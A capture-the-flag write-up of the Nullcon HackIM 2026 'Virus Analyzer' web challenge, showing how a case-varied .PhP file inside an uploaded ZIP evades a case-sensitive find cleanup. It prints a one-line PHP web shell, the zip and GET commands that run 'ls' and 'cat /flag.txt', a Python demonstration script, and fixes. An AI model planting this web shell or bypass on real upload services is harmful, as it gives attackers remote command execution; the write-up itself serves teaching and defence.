mis4nthr0pia

Nullcon HackIM CTF Goa 2026 – Virus Analyzer

Category: Web

Difficulty: Medium


1. Challenge Overview

The challenge presents a web service called Virus Analyzer. The UI is sleek and professional, mimicking a security tool. It invites users to upload a .zip archive, which it promises to extract and analyze for malicious content. Upon visiting the site, I noticed there was no source code provided, forcing a black-box approach.

The core functionality is simple:

  1. Upload a ZIP.
  2. The server extracts it to a random subdirectory in /uploads/.
  3. It lists the files and provides links to view them.
  4. It claims to be “safe” because it deletes uploaded files.

2. Vulnerability Analysis

The Discovery Phase (Step-by-Step Testing)

Since I didn’t have the source code initially, I had to poke at the server’s behavior:

  1. Standard File Upload: I uploaded a ZIP containing test.txt. It worked perfectly, and I could view the file at /uploads/[ID]/test.txt.
  2. The “PHP” Block Test: I uploaded a ZIP containing info.php (with <?php phpinfo(); ?>).
  • Observation: The results page showed info.php was extracted, but clicking the link resulted in a 404 Not Found.
  • Conclusion: There is an automated cleanup script deleting .php files almost immediately.
  3. The Case-Sensitivity Test: I know that many Linux-based cleanup scripts use standard find commands. I decided to test if the filter was case-sensitive by uploading a ZIP with cmd.PhP.
  • Observation: This file was NOT deleted. I was able to access the file and it was successfully parsed as PHP by the server.

Code Confirmation

Once I had a working shell, I ran cat ../../index.php to see the actual logic. The “Aha!” moment came from this line:

// Safety measure: delete all .php files after 10 seconds
$cmd = "(sleep 0 && find " . escapeshellarg($extract_dir) . " -name '*.php' -delete ) > /dev/null 2>&1 &";
exec($cmd);

The developer used -name '*.php', which find matches case-sensitively: a file ending in .PhP or .PHP is never matched, so it completely bypasses this security rule. Two further details are worth noting. The comment promises a ten-second delay, but the command actually sleeps 0, and it is pushed into the background with &, so even the files it does match are removed only after extraction has already finished and the directory is already being served. And because escapeshellarg is applied to $extract_dir, the directory name itself is not injectable; the weakness is purely in the pattern.


3. Developing the Exploit

I needed to weaponize the case-sensitivity bypass to get full control over the server.

  1. The Payload: I created a minimalist PHP web shell to minimize the chance of being caught by any actual “virus” scanners:
<?=`$_GET[0]`?>
  2. The Naming: I named the file cmd.PhP.
  3. The Delivery: I zipped the file using the command line:
zip exploit.zip cmd.PhP
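The bypass and the delivery, end to end, as an added example that is not part of the original writeup or of the challenge's own code. It builds the archive the way the steps above do, then models the server side of the Code Confirmation section: it extracts the archive into a scratch directory and runs the same find invocation against it, once with the deployed -name and once with the -iname fix, returning whatever survives. shlex.quote stands in for PHP's escapeshellarg, the trailing & is dropped so the end state is deterministic, and the file names and contents are constructed for the demonstration. The URL helper reuses the host and upload ID quoted in the PoC below; nothing here talks to the network, because the upload form's field names are not given on the page.

```python
import io
import os
import shlex
import subprocess
import tempfile
import zipfile
from urllib.parse import urlencode

# The one-line web shell from the writeup: the backtick operator runs $_GET[0] in a shell.
WEBSHELL = b"<?=`$_GET[0]`?>\n"

# Constructed upload: the three files tested in the writeup plus an all-caps variant.
SAMPLE_FILES = {
    "test.txt": b"harmless\n",
    "info.php": b"<?php phpinfo(); ?>\n",
    "cmd.PhP": WEBSHELL,
    "CMD.PHP": WEBSHELL,
}


def build_zip(files):
    """Attacker side: return the bytes of a ZIP archive holding the given {name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


def cleanup_survivors(zip_bytes, match_flag="-name"):
    """Server side (model of the challenge's index.php): extract the archive into a
    fresh directory, run the cleanup with the given find test (-name as deployed,
    -iname as the fix), and return the sorted names that survive it.

    The real command is backgrounded with '&'; here it runs in the foreground so the
    result can be inspected.  shlex.quote plays the role of PHP's escapeshellarg.
    """
    if match_flag not in ("-name", "-iname"):
        raise ValueError("match_flag must be -name or -iname")
    with tempfile.TemporaryDirectory(prefix="uploads-") as extract_dir:
        with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
            zf.extractall(extract_dir)  # as the challenge does: no member-name validation
        cmd = "(sleep 0 && find %s %s '*.php' -delete ) > /dev/null 2>&1" % (
            shlex.quote(extract_dir), match_flag)
        subprocess.run(cmd, shell=True, check=False)
        return sorted(os.listdir(extract_dir))


def shell_url(base, upload_id, command, shell_name="cmd.PhP"):
    """Build the GET request that makes the surviving shell run `command`."""
    query = urlencode({"0": command}, safe="/")  # 'cat /flag.txt' -> '0=cat+/flag.txt'
    return "%s/uploads/%s/%s?%s" % (base.rstrip("/"), upload_id, shell_name, query)


if __name__ == "__main__":
    archive = build_zip(SAMPLE_FILES)
    print("survives -name  :", cleanup_survivors(archive, "-name"))
    print("survives -iname :", cleanup_survivors(archive, "-iname"))
    print(shell_url("http://52.59.124.14:5008", "af3a98fdf74ef742", "cat /flag.txt"))
```

Run on a Linux host with findutils: with -name, both cmd.PhP and CMD.PHP are left next to test.txt while info.php is gone; with -iname, only test.txt survives. The second result is what the challenge's cleanup would have needed at minimum, and even that still leaves the window between extraction and deletion described above.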

4. The PoC (Proof of Concept)

  1. Upload: I uploaded exploit.zip via the web interface.
  2. Identify ID: The site redirected me to a results page with the path: /uploads/af3a98fdf74ef742/.
  3. Execution: I tested the shell by listing the root directory to see what I was working with.
  • URL: http://52.59.124.14:5008/uploads/af3a98fdf74ef742/cmd.PhP?0=ls /
  • Result: I saw a standard Linux directory structure and a very interesting flag.txt in the root.

5. The Winning Payload

With the location of the flag confirmed, the final payload was simple:

Command:

GET /uploads/af3a98fdf74ef742/cmd.PhP?0=cat+/flag.txt

6. Result

The server executed the cat command and returned the flag content:

Flag: ENO{cl34nup_scrip7s_4r3_n07_3n0ugh_8281}

Key Takeaways:

  • Blacklisting is not Security: Relying on specific file extensions for safety is a losing game; any spelling the server will execute but the filter does not match wins.
  • Find Command Nuance: In Linux, -name is case-sensitive. At a minimum the developer should have used -iname. Even then, a delete-after-the-fact cleanup leaves the file reachable between extraction and deletion, so the real fix is to keep uploads out of any directory the web server will execute scripts from, or to turn script execution off for /uploads altogether.
  • Execution Context: The web server was configured to parse any case variation of .php as a script, while the cleanup script was only looking for one specific spelling. Whenever two components disagree about what counts as “.php”, the attacker simply picks the name that satisfies the looser one.